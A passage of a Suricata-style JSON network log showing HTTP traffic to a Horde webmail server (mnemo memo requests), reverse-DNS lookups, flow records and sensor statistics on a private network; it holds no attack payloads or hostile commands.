{"timestamp":"2020-02-29T00:18:17.680210+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:18:19.000354+0000","flow_id":36278189856155,"event_type":"flow","src_ip":"192.168.10.122","src_port":46056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:18.890267+0000","end":"2020-02-29T00:13:18.998610+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:21.000202+0000","event_type":"stats","stats":{"uptime":14753,"capture":{"kernel_packets":136513,"kernel_drops":0},"decoder":{"pkts":136519,"bytes":93796452,"invalid":192,"ipv4":134988,"ipv6":10,"ethernet":136519,"raw":0,"null":0,"sll":0,"tcp":129559,"udp":5222,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093888},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_t
cp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2390,"failed_udp":112},"tx":{"http":4716,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2470}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2446,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19180,"memcap_state":0,"memcap_global":0},"http":{"memuse":41096,"memcap":0}}} {"timestamp":"2020-02-29T00:18:22.059601+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34874,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:18:22.074132+0000","flow_id":574334532723092,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46811,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:22.182286+0000","flow_id":574334532723092,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36137,"proto":"UDP","dns":{"type":"answer","id":46811,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:18:22.182286+0000","flow_id":574334532723092,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36137,"proto":"UDP","dns":{"type":"answer","id":46811,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:22.245963+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:18:22.245963+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":215,"tx_id":1}} 
{"timestamp":"2020-02-29T00:18:22.255851+0000","flow_id":773543705896811,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18162,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:22.365114+0000","flow_id":773543705896811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59659,"proto":"UDP","dns":{"type":"answer","id":18162,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:22.365114+0000","flow_id":773543705896811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59659,"proto":"UDP","dns":{"type":"answer","id":18162,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:22.471951+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5341}} 
{"timestamp":"2020-02-29T00:18:25.000682+0000","flow_id":780334029631261,"event_type":"flow","src_ip":"192.168.10.122","src_port":36750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:24.749341+0000","end":"2020-02-29T00:13:24.857976+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:27.000505+0000","flow_id":607027817694435,"event_type":"flow","src_ip":"192.168.10.130","src_port":34862,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":25,"bytes_toserver":2523,"bytes_toclient":23669,"start":"2020-02-29T00:16:49.869603+0000","end":"2020-02-29T00:17:26.378585+0000","age":37,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:18:27.477985+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34874,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5341},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":25658,"tx_id":2}} 
{"timestamp":"2020-02-29T00:18:28.000172+0000","event_type":"stats","stats":{"uptime":14760,"capture":{"kernel_packets":136522,"kernel_drops":0},"decoder":{"pkts":136536,"bytes":93805419,"invalid":192,"ipv4":135005,"ipv6":10,"ethernet":136536,"raw":0,"null":0,"sll":0,"tcp":129572,"udp":5226,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2392,"failed_udp":112},"tx":{"http":4718,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2472}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2447,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19511,"memcap_state":0,"memcap_global":0},"http":{"memuse":35606,"memcap":0}}} 
{"timestamp":"2020-02-29T00:18:29.000745+0000","flow_id":2225289892430090,"event_type":"flow","src_ip":"192.168.10.81","src_port":52768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":16,"bytes_toserver":2090,"bytes_toclient":15483,"start":"2020-02-29T00:17:19.098570+0000","end":"2020-02-29T00:17:28.722052+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:18:32.000589+0000","flow_id":1353815243338707,"event_type":"flow","src_ip":"192.168.10.122","src_port":42553,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:31.570323+0000","end":"2020-02-29T00:13:31.678579+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:32.000791+0000","flow_id":400710460705573,"event_type":"flow","src_ip":"192.168.10.122","src_port":45826,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:31.396069+0000","end":"2020-02-29T00:13:31.504125+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:18:33.000326+0000","flow_id":1579541559988013,"event_type":"flow","src_ip":"192.168.10.130","src_port":34866,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":9,"pkts_toclient":12,"bytes_toserver":1099,"bytes_toclient":9575,"start":"2020-02-29T00:17:27.151341+0000","end":"2020-02-29T00:17:32.580593+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:18:35.000167+0000","event_type":"stats","stats":{"uptime":14767,"capture":{"kernel_packets":136534,"kernel_drops":0},"decoder":{"pkts":136538,"bytes":93805551,"invalid":192,"ipv4":135007,"ipv6":10,"ethernet":136538,"raw":0,"null":0,"sll":0,"tcp":129574,"udp":5226,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2392,"failed_udp":112},"tx":{"http":4718,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2472}},"flow_mgr":{"closed_pruned":2793,"new_pruned":
17,"est_pruned":2450,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18849,"memcap_state":0,"memcap_global":0},"http":{"memuse":35526,"memcap":0}}} {"timestamp":"2020-02-29T00:18:42.000226+0000","event_type":"stats","stats":{"uptime":14774,"capture":{"kernel_packets":136534,"kernel_drops":0},"decoder":{"pkts":136538,"bytes":93805551,"invalid":192,"ipv4":135007,"ipv6":10,"ethernet":136538,"raw":0,"null":0,"sll":0,"tcp":129574,"udp":5226,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2392,"failed_udp":112},"tx":{"http":4718,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2472}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2450,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18849,"memcap_state":0,"memcap
_global":0},"http":{"memuse":35526,"memcap":0}}} {"timestamp":"2020-02-29T00:18:43.889571+0000","flow_id":110173123482339,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49631,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15827,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:43.998032+0000","flow_id":110173123482339,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49631,"proto":"UDP","dns":{"type":"answer","id":15827,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:43.998032+0000","flow_id":110173123482339,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49631,"proto":"UDP","dns":{"type":"answer","id":15827,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:44.564099+0000","flow_id":1980751639961820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202}} {"timestamp":"2020-02-29T00:18:47.000298+0000","flow_id":302931236246879,"event_type":"flow","src_ip":"192.168.10.122","src_port":36289,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:46.283999+0000","end":"2020-02-29T00:13:46.392737+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:18:49.000216+0000","event_type":"stats","stats":{"uptime":14781,"capture":{"kernel_packets":136545,"kernel_drops":0},"decoder":{"pkts":136557,"bytes":93815974,"invalid":192,"ipv4":135026,"ipv6":10,"ethernet":136557,"raw":0,"null":0,"sll":0,"tcp":129591,"udp":5228,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2811,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2827,"synack":2818,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1848,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2393,"failed_udp":112},"tx":{"http":4719,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2473}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2451,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18848,"memcap_state":0,"memcap_global":0},"http":{"memuse":121149,"memcap":0}}} 
{"timestamp":"2020-02-29T00:18:49.566853+0000","flow_id":1980751639961820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52774,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":48903,"tx_id":0}} {"timestamp":"2020-02-29T00:18:51.102531+0000","flow_id":1992764664025219,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52667,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31596,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:51.207491+0000","flow_id":1992764664025219,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52667,"proto":"UDP","dns":{"type":"answer","id":31596,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:51.207491+0000","flow_id":1992764664025219,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52667,"proto":"UDP","dns":{"type":"answer","id":31596,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:51.299739+0000","flow_id":2049226304089160,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34876,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608}} {"timestamp":"2020-02-29T00:18:52.000255+0000","flow_id":720204489272861,"event_type":"flow","src_ip":"192.168.10.122","src_port":37890,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:51.634397+0000","end":"2020-02-29T00:13:51.742601+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:54.000424+0000","flow_id":902968232767834,"event_type":"flow","src_ip":"192.168.10.122","src_port":38101,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:53.127322+0000","end":"2020-02-29T00:13:53.235775+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:55.950562+0000","flow_id":171140185030946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35507,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54231,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:18:56.000204+0000","event_type":"stats","stats":{"uptime":14788,"capture":{"kernel_packets":136566,"kernel_drops":0},"decoder":{"pkts":136580,"bytes":93823981,"invalid":192,"ipv4":135045,"ipv6":10,"ethernet":136580,"raw":0,"null":0,"sll":0,"tcp":129608,"udp":5230,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2812,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2828,"synack":2819,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1849,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2394,"failed_udp":112},"tx":{"http":4720,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2474}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2453,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18777,"memcap_state":0,"memcap_global":0},"http":{"memuse":53216,"memcap":0}}} 
{"timestamp":"2020-02-29T00:18:56.058921+0000","flow_id":171140185030946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35507,"proto":"UDP","dns":{"type":"answer","id":54231,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:56.058921+0000","flow_id":171140185030946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35507,"proto":"UDP","dns":{"type":"answer","id":54231,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:56.259004+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like 